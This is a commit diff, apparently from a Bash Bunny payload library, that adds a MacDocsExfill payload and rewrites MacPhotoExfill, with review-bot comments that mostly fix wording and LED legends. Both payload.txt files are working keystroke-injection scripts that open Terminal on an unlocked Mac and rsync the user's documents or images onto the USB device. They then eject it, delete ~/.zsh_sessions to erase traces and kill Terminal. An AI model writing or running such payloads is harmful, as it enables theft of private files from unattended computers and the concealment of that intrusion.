Update of MacPhotoExfill & Create MacDocsExfill (#588)
* Update readme.md

* Update payload.txt

* Create MacDocsExfill

* Delete MacDocsExfill

* Add files via upload
afsh4ck authored Jun 10, 2023
1 parent 0279a82 commit 37a4d9b
Showing 4 changed files with 165 additions and 27 deletions.
78 changes: 78 additions & 0 deletions payloads/library/exfiltration/MacDocsExfill/payload.txt
@@ -0,0 +1,78 @@
#!/bin/bash
#
# Title: MacDocsExfill
# Author: afsh4ck
# Version: 1.0
# Target: MacOS
# Category: Exfiltration
#
# Exfilter all the images from the principal folders on unlocked MacOS targets.
# Stashes them in /loot/MacDocsExfill
#
# Purple Setup
# Amber..............Attack Mode ON
# Green..............Finished

LED SETUP
ATTACKMODE HID STORAGE ECM_ETHERNET
GET TARGET_HOSTNAME
QUACK DELAY 1000

lootdir=loot/MacDocsExfill/$TARGET_HOSTNAME
mkdir -p /root/udisk/$lootdir

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2000

LED STAGE 1

QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Desktop;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
QUACK ENTER
QUACK STRING rsync -av Documents/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Documents ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Desktop/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Desktop ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Downloads/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Downloads ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER

# Ensure sincronization
sync

# Cleanup and delete proofs
LED STAGE 2
QUACK ENTER

# Eject BB storage
QUACK STRING diskutil eject /Volumes/BashBunny/
QUACK ENTER
QUACK DELAY 500

# Remove terminal history from current session (commands used in attack won't be visible with the history command)
QUACK STRING rm -r ~/.zsh_sessions
QUACK ENTER
QUACK DELAY 500

# Exit terminal
QUACK STRING killall Terminal
QUACK ENTER

LED FINISH
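Review bot: the header comment of this new file was copied from MacPhotoExfill and is wrong for this payload: it says "Exfilter all the images from the principal folders" while the rsync lines only match `*.{docx,xlsx,pdf}`, so it should say "documents" (and "Exfiltrate"). The LED legend in the header (`Purple Setup`, `Amber Attack Mode ON`, `Green Finished`) matches neither the `LED SETUP` / `LED STAGE 1` / `LED STAGE 2` / `LED FINISH` calls the script actually makes nor the LED table in this file's readme; keep one legend and make the other files follow it. The `# Cleanup and delete proofs` comment sits above `LED STAGE 2` and a bare `QUACK ENTER` instead of above the commands it describes (`diskutil eject`, `rm -r ~/.zsh_sessions`, `killall Terminal`), which each carry their own comment; move the comment or drop the stray ENTER. Each `QUACK STRING wait;` is dead code: the `rsync` before it runs in the foreground, so there are no background jobs and `wait` returns at once, and the "Please wait while the files are copied..." echo is printed after the copy has already completed. `# Ensure sincronization` should read `synchronization`. Finally, the `# Remove terminal history` comment understates what `rm -r ~/.zsh_sessions` does: it deletes the user's whole Terminal session-restore directory, a destructive side effect on the target that the readme should state plainly.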
46 changes: 46 additions & 0 deletions payloads/library/exfiltration/MacDocsExfill/readme.md
@@ -0,0 +1,46 @@
# Mac Docs Exfilter for the BashBunny

_______ ______ ______ __ __
| \ / \ / \ | \ | \
| $$$$$$$\| $$$$$$\| $$$$$$\ | $$ | $$
| $$ | $$| $$ | $$| $$ \$$______ \$$\/ $$
| $$ | $$| $$ | $$| $$ | \ >$$ $$
| $$ | $$| $$ | $$| $$ __ \$$$$$$/ $$$$\
| $$__/ $$| $$__/ $$| $$__/ \ | $$ \$$\
| $$ $$ \$$ $$ \$$ $$ | $$ | $$
\$$$$$$$ \$$$$$$ \$$$$$$ \$$ \$$


* Author: afsh4ck
* Version: 1.0
* Target: MacOS
* Tested on: Ventura 13.3.1
* Category: Exfiltration

# DESCRIPTION

Exfilter all the documents from the principal folders on unlocked MacOS targets.
Stashes them in /loot/MacDocsExfill/$hostname grouped in subfolders:

| Subfolder | Content |
| ------------------ | -------------------------------------------- |
| Documents | All the docs in /root/Documents folder |
| Desktop | All the docs in /root/Desktop folder |
| Downloads | All the docs in /root/Downloads folder |

# IMAGE FORMATS

| Format |
| ------------------ |
| .docx |
| .xlsx |
| .pdf |

# LED STATUS

| LED | Status |
| ------------------ | -------------------------------------------- |
| Green | Setup |
| Yellow Blink | Attack Mode ON |
| Purple Slow | Cleaning all proofs |
| Green Fixed | Finish |
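Review bot: the `# IMAGE FORMATS` heading is left over from the photo payload; the table under it lists `.docx`, `.xlsx` and `.pdf`, so it should read `# DOCUMENT FORMATS` (and "Exfilter" in the title and description should be "Exfiltrate"). The subfolder table names the sources as `/root/Documents`, `/root/Desktop` and `/root/Downloads`, but payload.txt uses the relative paths `Documents/`, `Desktop/` and `Downloads/` under the logged-in user's home on the target, so `/root` is misleading; likewise the description says loot lands in `/loot/MacDocsExfill/$hostname` while payload.txt creates `/root/udisk/loot/MacDocsExfill/$TARGET_HOSTNAME` on the Bunny, and the full path should be stated. The LED STATUS table (Green Setup, Yellow Blink, Purple Slow, Green Fixed) does not match the `LED SETUP` / `LED STAGE 1` / `LED STAGE 2` / `LED FINISH` sequence in payload.txt or the legend in its header; keep the two files in sync. The ASCII banner is not inside a code fence, so a markdown renderer collapses its whitespace and joins the lines into one paragraph; wrap it in a fenced block.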
45 changes: 31 additions & 14 deletions payloads/library/exfiltration/MacPhotoExfill/payload.txt
Expand Up @@ -2,7 +2,7 @@
#
# Title: MacPhotoExfill
# Author: afsh4ck
# Version: 1.0
# Version: 1.1
# Target: MacOS
# Category: Exfiltration
#
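Review bot: the bump from `Version: 1.0` to `Version: 1.1` has no accompanying changelog line anywhere in the commit, even though the rest of this file is substantially rewritten (cp replaced by rsync, LED states renamed, cleanup reordered); add a short note of what changed, and bump the readme's `* Version:` line too, since the readme changes in this commit touch only the banner and the trailing newline.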
Expand All @@ -27,7 +27,7 @@ QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2000

LED ATTACK
LED STAGE 1

QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
QUACK ENTER
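Review bot: renaming `LED ATTACK` to `LED STAGE 1` changes the LED pattern the readme documents; the readme's LED STATUS table is not touched in this commit and still lists "Yellow Blink" for "Attack Mode ON" and "Purple Slow" for "Cleaning all proofs", which described the old `LED ATTACK` and `LED M SLOW` calls (the latter is removed further down in this file). Update the table to the new `LED STAGE 1` / `LED STAGE 2` states or keep the old calls.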
Expand All @@ -37,33 +37,50 @@ QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Pictures;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
QUACK ENTER
QUACK STRING cp Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
QUACK STRING rsync -av Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
QUACK ENTER
QUACK STRING cp Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING cp Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
QUACK STRING wait;
QUACK ENTER
QUACK STRING cp Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
QUACK STRING rsync -av Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
QUACK ENTER
# We can control the time for the payload execution
QUACK DELAY 25000
QUACK CTRL C
# Cleanup and delete proofs
LED M SLOW
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER

# Ensure sincronization
sync

# Cleanup and delete proofs
LED STAGE 2
QUACK ENTER

# Eject BB storage
QUACK STRING diskutil eject /Volumes/BashBunny/
QUACK ENTER
QUACK DELAY 500

# Remove terminal history from current session (commands used in attack won't be visible with the history command)
QUACK STRING rm -r ~/.zsh_sessions
QUACK ENTER
QUACK DELAY 500

# Exit terminal
QUACK STRING killall Terminal
QUACK ENTER
# Ensure sincronization
sync

LED FINISH
LED FINISH
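Review bot: the cleanup block has lost its structure: `# Cleanup and delete proofs` now precedes `LED STAGE 2` and a stray `QUACK ENTER`, while the commands it describes (`diskutil eject`, `rm -r ~/.zsh_sessions`, `killall Terminal`) follow under their own comments; move the comment or remove the stray ENTER. Each `QUACK STRING wait;` is dead code, since the `rsync` before it runs in the foreground and leaves no background job for `wait` to wait on, and the "Please wait while the files are copied..." echo is therefore printed after the copy has already finished; either drop both or make the message honest. The removed `# We can control the time for the payload execution` / `QUACK DELAY 25000` / `QUACK CTRL C` block was the only documented timing control, and its removal is not mentioned anywhere; the readme should say that the payload now runs to completion. `# Ensure sincronization` should read `synchronization`. The `# Remove terminal history` comment understates `rm -r ~/.zsh_sessions`, which deletes the user's entire Terminal session-restore directory, a destructive side effect on the target that belongs in the readme.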
23 changes: 10 additions & 13 deletions payloads/library/exfiltration/MacPhotoExfill/readme.md
@@ -1,17 +1,14 @@
# Mac Photo Exfilter for the BashBunny


* ___ ___ ___ ___ ___ ___ ___
* / /\ / /\ / /\ /__/\ / /\ / /\ /__/|
* / /::\ / /:/_ / /:/_ \ \:\ / /::\ / /:/ | |:|
* / /:/\:\ / /:/ /\ / /:/ /\ \__\:\ / /:/\:\ / /:/ | |:|
* / /:/ /::\ / /:/ /:// /:/ /::\ ___ / /::\ / /:/ /::\ / /:/ ___ __| |:|
* /__/:/ /:/\:\/__/:/ /://__/:/ /:/\:\/__/\ /:/\:\/__/:/ /:/\:\/__/:/ / /\/__/\_|:|____
* \ \:\/:/__\/\ \:\/:/ \ \:\/:/ /:/\ \:\/:/__\/\ \:\/:/__\/\ \:\ / /:/\ \:\/:::::/
* \ \::/ \ \::/ \ \::/ /:/ \ \::/ \ \::/ \ \:\ /:/ \ \::/---
* \ \:\ \ \:\ \__\/ /:/ \ \:\ \ \:\ \ \:\/:/ \ \:\
* \ \:\ \ \:\ /__/:/ \ \:\ \ \:\ \ \::/ \ \:\
* \__\/ \__\/ \__\/ \__\/ \__\/ \__\/ \__\/
_______ __ __ ______ ________ ______ __ __
| \ | \ | \ / \| \ / \ | \ | \
| $$$$$$$\| $$ | $$| $$$$$$\\$$$$$$$$| $$$$$$\ | $$ | $$
| $$__/ $$| $$__| $$| $$ | $$ | $$ | $$ | $$ ______ \$$\/ $$
| $$ $$| $$ $$| $$ | $$ | $$ | $$ | $$| \ >$$ $$
| $$$$$$$ | $$$$$$$$| $$ | $$ | $$ | $$ | $$ \$$$$$$/ $$$$\
| $$ | $$ | $$| $$__/ $$ | $$ | $$__/ $$ | $$ \$$\
| $$ | $$ | $$ \$$ $$ | $$ \$$ $$ | $$ | $$
\$$ \$$ \$$ \$$$$$$ \$$ \$$$$$$ \$$ \$$


* Author: afsh4ck
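Review bot: the old banner lines began with `* `, which markdown rendered as a bullet list, and the replacement lines begin with `|`, `\$$` and long runs of spaces that a renderer will also mangle by collapsing whitespace and joining the lines into one paragraph; put the banner in a fenced code block so it renders as drawn. This hunk ends at the `* Author:` line and the commit leaves the `* Version:` line below it unchanged while payload.txt moves to 1.1; bump it in the same change.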
Expand Down Expand Up @@ -47,4 +44,4 @@ Stashes them in /loot/MacPhotoExfill/$hostname grouped in subfolders:
| Green | Setup |
| Yellow Blink | Attack Mode ON |
| Purple Slow | Cleaning all proofs |
| Green Fixed | Finish |
| Green Fixed | Finish |
